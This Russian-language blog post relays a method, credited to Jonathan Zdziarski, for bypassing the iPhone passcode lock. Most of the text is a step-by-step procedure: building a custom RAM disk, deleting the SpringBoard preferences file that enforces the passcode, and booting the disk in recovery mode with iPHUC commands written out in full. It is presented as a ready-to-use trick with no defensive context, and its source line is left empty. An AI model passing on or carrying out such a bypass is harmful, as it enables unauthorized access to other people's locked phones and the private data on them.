Многие из вас пользуются такой функцией, как “Защита паролем”.
Но мало кто знает, что эту защиту достаточно легко обойти.
Нервный Газ, Jonathan Zdziarski, сегодня опубликовал способ как обойти эту защиту:
1. Подготовьте кастомный iPhone RAM disk. В интернете полно ФАКов как это сделать (например при помощи iLiberty+). Смонтируйте ваш RAM disk /dev/rdisk0s2 и удалите файл /mnt/mobile/Library/Preferences/com.apple.springboard.plist. Это конфиг, который говорит Springboard “passcode: on”
2. С помощью какой-нибудь утилиты введите iPhone в “recovery mode” и после этого загрузите RAM диск используя что-то вроде этого:
(iPHUC Recovery) #: filecopytophone Bypass_Passcode.bin
(iPHUC Recovery) #: cmd setenv boot-args rd=md0 -x -s pmd0=0x9340000.0xA00000
(iPHUC Recovery) #: cmd saveenv
(iPHUC Recovery) #: cmd bootx
3. После чего перезагрузите iPhone и вуаля: защиты паролем больше нет.
Источник: